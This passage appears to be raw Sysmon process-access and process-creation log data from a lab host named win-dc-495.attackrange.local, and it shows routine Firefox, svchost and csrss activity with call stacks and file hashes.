Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000016970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program 
Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000016967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program 
Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39bf2|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.469{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.28.1970743161\168315061" -childID 5 -isForBrowser -prefsHandle 4980 -prefMapHandle 4976 -prefsLen 11300 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 
"\\.\pipe\gecko-crash-server-pipe.7052" 4700 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program 
Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.455{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.27.839066311\1710581146" -childID 4 -isForBrowser -prefsHandle 4928 -prefMapHandle 4736 -prefsLen 11300 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 
"\\.\pipe\gecko-crash-server-pipe.7052" 4212 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.444{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.444{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.443{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.411{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla 
Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.411{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.411{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program 